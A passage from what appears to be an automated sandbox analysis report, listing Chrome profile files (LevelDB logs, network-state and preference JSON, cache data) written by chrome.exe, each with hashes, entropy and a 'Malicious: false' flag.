SHA1:	AAB2160EFDF0FE2C2B54BCE7D9D2CDD6C7DB58BB
SHA-256:	6C09A5482BC789FE1B4AB617417D7A3867EB99D4BF8D969CF53D83CE6F32B073
SHA-512:	44305683F96D24B06AB29A16C376A6414A3B7A5851AE2333272212F1BCFC8251A0EC9C7C8162C12885E8E26608E8DEF4849B28E603F3D0E32AC472EA96B16C02
Malicious:	false
Preview:	2021/12/06-19:09:05.906 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.2021/12/06-19:09:05.908 1b0c Recovering log #3.2021/12/06-19:09:05.909 1b0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG.olde/ (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.232752831339721
Encrypted:	false
SSDEEP:	6:mBPvE+q2PWXp+N23iKKdKusNpZQMxIFUtAPvlFWZmw2PvVb3VkwOWXp+N23iKKd0:uPvE+va5KkMFUtAPvW/2PvF3V5f5KkTJ
MD5:	B49BA3490E0D8189CBE7C85BFC187BD9
SHA1:	AAB2160EFDF0FE2C2B54BCE7D9D2CDD6C7DB58BB
SHA-256:	6C09A5482BC789FE1B4AB617417D7A3867EB99D4BF8D969CF53D83CE6F32B073
SHA-512:	44305683F96D24B06AB29A16C376A6414A3B7A5851AE2333272212F1BCFC8251A0EC9C7C8162C12885E8E26608E8DEF4849B28E603F3D0E32AC472EA96B16C02
Malicious:	false
Preview:	2021/12/06-19:09:05.906 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.2021/12/06-19:09:05.908 1b0c Recovering log #3.2021/12/06-19:09:05.909 1b0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\d4275cfd-ccb1-4009-b9d1-09d7468f2cf1.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	420
Entropy (8bit):	4.985305467053914
Encrypted:	false
SSDEEP:	6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
MD5:	C401B619D9D8E0ADABC25A47EE49CFBA
SHA1:	C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
SHA-256:	8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
SHA-512:	BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\5f96ad4d-0c8f-481e-b9ae-c5408d012835.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	420
Entropy (8bit):	4.954960881489904
Encrypted:	false
SSDEEP:	12:YHO8sdvBVSsB6M/BVSsBdLJlyH7E4f3K33y:YXsdvjX6gjXdL3yH7n/iy
MD5:	F4FEFEEEC722772F9DC0FCE1B52D79B5
SHA1:	00EECFA3B37113D30E7D43BE4383C540F3D93D4D
SHA-256:	D33E13C12004A700F246D8C73709114A881609D658E045D54DE36874728D07F0
SHA-512:	41E61EC89366800FD5F4DD704E53B47DE29411B9088B46349A0A350758D08569C14DCC70CF8D6A6FE6D049CB6D32F2B091153E8148A1B5857BD7AF13492071BE
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543498399332","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543498399332","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	430
Entropy (8bit):	5.1952845228936155
Encrypted:	false
SSDEEP:	12:uPLJva5KkkGHArBFUtAPLz/2PLj5f5KkkGHAryJ:mha5KkkGgPgMepf5KkkGga
MD5:	13E39F4AA505D9A356E0ECD930AF9937
SHA1:	9C2FA6C1A673DCD153376ABD70B4C926B568EA19
SHA-256:	1C50D053143FE3300BC973895B694E5A8073B38B6AD389C2D95AF29ED685D6E9
SHA-512:	8446EF39C38331E51FCE1BF747B4BCBA357955C2A0B8329E69E5B8902F9130401C28E8CA72D0290CF59926A70F414BEBD0A9C6B203994C6D48F8A4D37454A01A
Malicious:	false
Preview:	2021/12/06-19:09:27.211 1a34 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/MANIFEST-000001.2021/12/06-19:09:27.214 1a34 Recovering log #3.2021/12/06-19:09:27.216 1a34 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	430
Entropy (8bit):	5.1952845228936155
Encrypted:	false
SSDEEP:	12:uPLJva5KkkGHArBFUtAPLz/2PLj5f5KkkGHAryJ:mha5KkkGgPgMepf5KkkGga
MD5:	13E39F4AA505D9A356E0ECD930AF9937
SHA1:	9C2FA6C1A673DCD153376ABD70B4C926B568EA19
SHA-256:	1C50D053143FE3300BC973895B694E5A8073B38B6AD389C2D95AF29ED685D6E9
SHA-512:	8446EF39C38331E51FCE1BF747B4BCBA357955C2A0B8329E69E5B8902F9130401C28E8CA72D0290CF59926A70F414BEBD0A9C6B203994C6D48F8A4D37454A01A
Malicious:	false
Preview:	2021/12/06-19:09:27.211 1a34 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/MANIFEST-000001.2021/12/06-19:09:27.214 1a34 Recovering log #3.2021/12/06-19:09:27.216 1a34 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent State (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	420
Entropy (8bit):	4.954960881489904
Encrypted:	false
SSDEEP:	12:YHO8sdvBVSsB6M/BVSsBdLJlyH7E4f3K33y:YXsdvjX6gjXdL3yH7n/iy
MD5:	F4FEFEEEC722772F9DC0FCE1B52D79B5
SHA1:	00EECFA3B37113D30E7D43BE4383C540F3D93D4D
SHA-256:	D33E13C12004A700F246D8C73709114A881609D658E045D54DE36874728D07F0
SHA-512:	41E61EC89366800FD5F4DD704E53B47DE29411B9088B46349A0A350758D08569C14DCC70CF8D6A6FE6D049CB6D32F2B091153E8148A1B5857BD7AF13492071BE
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543498399332","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543498399332","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	432
Entropy (8bit):	5.223070393837136
Encrypted:	false
SSDEEP:	12:uPLT+va5KkkGHArqiuFUtAPLFL1/2PLLNV5f5KkkGHArq2J:m8a5KkkGgCgMxwtf5KkkGg7
MD5:	5D5B38CAE9BCDC5BE015BE0F26A4C022
SHA1:	2FCE4EE902280D013BC5DFDB58517A058A7D5CBD
SHA-256:	05BF6A0A59074F805D8A245DE138359B10089864AF63D553B7C2FEC0836F0E07
SHA-512:	01F3DB8715D915A8B68CB41F3AEE66903BBFC7DB146A94A3C34F9E2D2677F6DCC9EFEAAFD7A562AA8BD6892C89FCC4A34B49D64E816E4F3C093827F92E3F670C
Malicious:	false
Preview:	2021/12/06-19:09:27.209 187c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications/MANIFEST-000001.2021/12/06-19:09:27.212 187c Recovering log #3.2021/12/06-19:09:27.214 187c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	432
Entropy (8bit):	5.223070393837136
Encrypted:	false
SSDEEP:	12:uPLT+va5KkkGHArqiuFUtAPLFL1/2PLLNV5f5KkkGHArq2J:m8a5KkkGgCgMxwtf5KkkGg7
MD5:	5D5B38CAE9BCDC5BE015BE0F26A4C022
SHA1:	2FCE4EE902280D013BC5DFDB58517A058A7D5CBD
SHA-256:	05BF6A0A59074F805D8A245DE138359B10089864AF63D553B7C2FEC0836F0E07
SHA-512:	01F3DB8715D915A8B68CB41F3AEE66903BBFC7DB146A94A3C34F9E2D2677F6DCC9EFEAAFD7A562AA8BD6892C89FCC4A34B49D64E816E4F3C093827F92E3F670C
Malicious:	false
Preview:	2021/12/06-19:09:27.209 187c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications/MANIFEST-000001.2021/12/06-19:09:27.212 187c Recovering log #3.2021/12/06-19:09:27.214 187c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Platform Notifications/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.167367961004019
Encrypted:	false
SSDEEP:	12:uP7Iva5KkkGHArAFUtAP9Z/2P9z5f5KkkGHArfJ:m76a5KkkGgkgMOPf5KkkGgV
MD5:	BB93D231633204DE449D9A2CEAB27842
SHA1:	3C76D136617155C3AD08DEFD1756D24AC6766333
SHA-256:	A41A8E6E0AEDF600429EBD2AF10BE193884575DC51583360CC0D5B88909DCBD2
SHA-512:	B7302B43FE1506C291BA3650F0D5EA76CB7AE90FB2C234A5B757A428F5E6407A4EE448110CE2858FD13FAE2C18A9F0CC807F726D9B9A2B3C7696836CC62A8A13
Malicious:	false
Preview:	2021/12/06-19:09:42.400 1a34 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/MANIFEST-000001.2021/12/06-19:09:42.402 1a34 Recovering log #3.2021/12/06-19:09:42.402 1a34 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG.olde/ (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.167367961004019
Encrypted:	false
SSDEEP:	12:uP7Iva5KkkGHArAFUtAP9Z/2P9z5f5KkkGHArfJ:m76a5KkkGgkgMOPf5KkkGgV
MD5:	BB93D231633204DE449D9A2CEAB27842
SHA1:	3C76D136617155C3AD08DEFD1756D24AC6766333
SHA-256:	A41A8E6E0AEDF600429EBD2AF10BE193884575DC51583360CC0D5B88909DCBD2
SHA-512:	B7302B43FE1506C291BA3650F0D5EA76CB7AE90FB2C234A5B757A428F5E6407A4EE448110CE2858FD13FAE2C18A9F0CC807F726D9B9A2B3C7696836CC62A8A13
Malicious:	false
Preview:	2021/12/06-19:09:42.400 1a34 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/MANIFEST-000001.2021/12/06-19:09:42.402 1a34 Recovering log #3.2021/12/06-19:09:42.402 1a34 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	160
Entropy (8bit):	3.0217164415295743
Encrypted:	false
SSDEEP:	3:sLollttz6sjlGXU2tk0lkGgGgGgGgGg:qolXtWswXU2tkEtttt
MD5:	DE92AD90BE6D3364745B2F73F4C3CF73
SHA1:	9158681463BD30E5AF4DDA4BAAC81F93CEDBDA77
SHA-256:	0025A3E0D3B834401B3B5F820E1991EF7E810D9A4B8B6B579E6301C94E7031A0
SHA-512:	9E81CEFC195439439F4B23EE7696309D7BC3C08E5B444D2ABDE26D2F12B2D3BCFD124FB9A2D40C6389E9F787741676FAD366A2E9982674E7B931028C014D8A79
Malicious:	false
Preview:	...n'................_mts_schema_descriptor.....F..................F..................F..................F..................F..................F................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.287317656778644
Encrypted:	false
SSDEEP:	6:mBPdGq2PWXp+N23iKKdKpIFUtAPdIXHZmw2PdIhkwOWXp+N23iKKdKa/WLJ:uPkva5KkmFUtAP+XH/2P+h5f5KkaUJ
MD5:	88A0E01C719B809EFC6BB2D2C99AF717
SHA1:	0E99BEC1DC17CF1F2D58D977ABB5FA535D70709A
SHA-256:	DF7901B3B403B4007A75D96F1A4D06B1C6BF8527C050B2CBE688E5D5CA9D6B6D
SHA-512:	C20B98F9C0BC84E1BAA4406BA5FC34B1915BA5E4785EC31176DD946EF96FB38D3A4D9274FDBB8BE0B7B375F6CA22807B5EA02D09F72488AC95A6C7E37A1A12F2
Malicious:	false
Preview:	2021/12/06-19:08:49.433 1864 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2021/12/06-19:08:49.443 1864 Recovering log #3.2021/12/06-19:08:49.447 1864 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old.. (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.287317656778644
Encrypted:	false
SSDEEP:	6:mBPdGq2PWXp+N23iKKdKpIFUtAPdIXHZmw2PdIhkwOWXp+N23iKKdKa/WLJ:uPkva5KkmFUtAP+XH/2P+h5f5KkaUJ
MD5:	88A0E01C719B809EFC6BB2D2C99AF717
SHA1:	0E99BEC1DC17CF1F2D58D977ABB5FA535D70709A
SHA-256:	DF7901B3B403B4007A75D96F1A4D06B1C6BF8527C050B2CBE688E5D5CA9D6B6D
SHA-512:	C20B98F9C0BC84E1BAA4406BA5FC34B1915BA5E4785EC31176DD946EF96FB38D3A4D9274FDBB8BE0B7B375F6CA22807B5EA02D09F72488AC95A6C7E37A1A12F2
Malicious:	false
Preview:	2021/12/06-19:08:49.433 1864 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2021/12/06-19:08:49.443 1864 Recovering log #3.2021/12/06-19:08:49.447 1864 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	402
Entropy (8bit):	5.339804092715723
Encrypted:	false
SSDEEP:	12:uI++va5KkkOrsFUtA7Qz1/25VV5f5KkkOrzJ:Pa5Kk+goQcNf5Kkn
MD5:	F9C39D7E41325D947A46E9BE87DE76FD
SHA1:	637D0168B36F841F87D249631C3C7662F762473B
SHA-256:	CB9848B38DD5279CFCC29F5EB5E82BF472163435C3209283D659D6D03CACBDF6
SHA-512:	39C3A852E301AC151A65498C40181BDEDA3A4CCFA4F9A1BF709DB00603C54885EECB384945B746B3D71CFE627935F7EA321CB625AE2F48197DF2F35399193558
Malicious:	false
Preview:	2021/12/06-19:10:19.325 187c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/MANIFEST-000001.2021/12/06-19:10:19.326 187c Recovering log #3.2021/12/06-19:10:19.327 187c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old. (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	402
Entropy (8bit):	5.339804092715723
Encrypted:	false
SSDEEP:	12:uI++va5KkkOrsFUtA7Qz1/25VV5f5KkkOrzJ:Pa5Kk+goQcNf5Kkn
MD5:	F9C39D7E41325D947A46E9BE87DE76FD
SHA1:	637D0168B36F841F87D249631C3C7662F762473B
SHA-256:	CB9848B38DD5279CFCC29F5EB5E82BF472163435C3209283D659D6D03CACBDF6
SHA-512:	39C3A852E301AC151A65498C40181BDEDA3A4CCFA4F9A1BF709DB00603C54885EECB384945B746B3D71CFE627935F7EA321CB625AE2F48197DF2F35399193558
Malicious:	false
Preview:	2021/12/06-19:10:19.325 187c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/MANIFEST-000001.2021/12/06-19:10:19.326 187c Recovering log #3.2021/12/06-19:10:19.327 187c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\afe570b4-d68a-48b3-906a-80551884b651.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4871
Entropy (8bit):	4.96374295872605
Encrypted:	false
SSDEEP:	48:YciUkPkTiHj5c3WbEEqAOqqTlYqlQKHoTw0amH3CH3G/s8C1Nfct/9BhUJo3Khm8:n6A3/pt9pcKI5ok0JCKL8ibOTQVuwn
MD5:	8DBC99D2A9E830480F8803B2FC4402BC
SHA1:	84A99F5EB43D12F33D8FE0ACD0053C32721BA515
SHA-256:	489351082DA1973C3829B6DD02EC74D218A78C3450F55F0204963A46FCC6B6C0
SHA-512:	4799D3E8B3825D7DCEAFBCDCAF5C96EA2ED82C7D774BDB6380502809196C49A5535A4B52350BD51958ECD7B2FEF7666239F4D054E84008DDADC3AB486C1A675D
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\b0541fc4-450c-49c2-9434-f694e6fbb15b.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	15601
Entropy (8bit):	5.603196901480548
Encrypted:	false
SSDEEP:	384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rUv6hO4B0:TLl9i1kXqKf/pUZNCgVLH2HfgrUvIOJ
MD5:	97ABBEFBFD124D80BB39B643FD4F2BE3
SHA1:	F40A5119D6272F27074A48BD3C4436B5985B7DC3
SHA-256:	626E68C4F0F13218D8EE29EB8F00668595D1D759313A0B714C3072BBEFE10FA2
SHA-512:	DFE0CD43908BEE905E89531BB1E7D3DA7BDE2A31CCA2FCFE401489A3F48034409631481F2C743ABA54CF719FA35C98C44410B6366866781E7942523FE66EA986
Malicious:	false
Preview:	{"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\c0ca93c8-b969-4ca1-a409-af5f66935290.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	2083
Entropy (8bit):	4.900523861620045
Encrypted:	false
SSDEEP:	48:Y2TtwCXGDH3qz5sL9KGs0RLsUSsBvrqXsEMH7snMHjDYhbD:JTOCXGDHazi9K2LjrGGeGwhH
MD5:	71C6DA154986CFFE2027ACFF96928DA5
SHA1:	F2CB74BCA5322D39CE745289F58D90D5D008BD4E
SHA-256:	19F4F3040934E9EA944D006288ED046973A414B754D270479BBB12FB0B0BD831
SHA-512:	6DDBBC8EC02DCF16EA8E37A0E40FE5A6A2103153BA1123ED96ABB01BF59C6FFBDE4BF0BFD54095E33B710DCA47557BC2ADB27C8EE475C0BA155B22CC33A8B7C9
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13285912131531273","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://redirector.gvt1.com"},{"alternative_service":[{"advertised_versions":[50],"expiration":"13285912131555730","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://accounts.google.com","supports_spdy":true},{

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\c1a4e162-0f34-498c-9cda-797eccca8e85.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	21244
Entropy (8bit):	5.552044581640642
Encrypted:	false
SSDEEP:	384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rULHGqnTM6zvO4kyK:TLl9i1kXqKf/pUZNCgVLH2HfgrUbGqnI
MD5:	B040EF7F2EC00997C30F14B28FA73FDD
SHA1:	9F52CFCE8C275F9275DF204CCDC7C6642E5F576F
SHA-256:	853303EEAF0981B8AFF4388B6132F71D4043CE46B002D0564E18B5DE0CC0F730
SHA-512:	849D7BA46B176AB2F012E57A47B4D1E7E14682D49D0B1F160BFE35CAD594644793344713B6AD764A5C2B1363C6B462E01DC42F50AE5DB524F51478B9D88B7D13
Malicious:	false
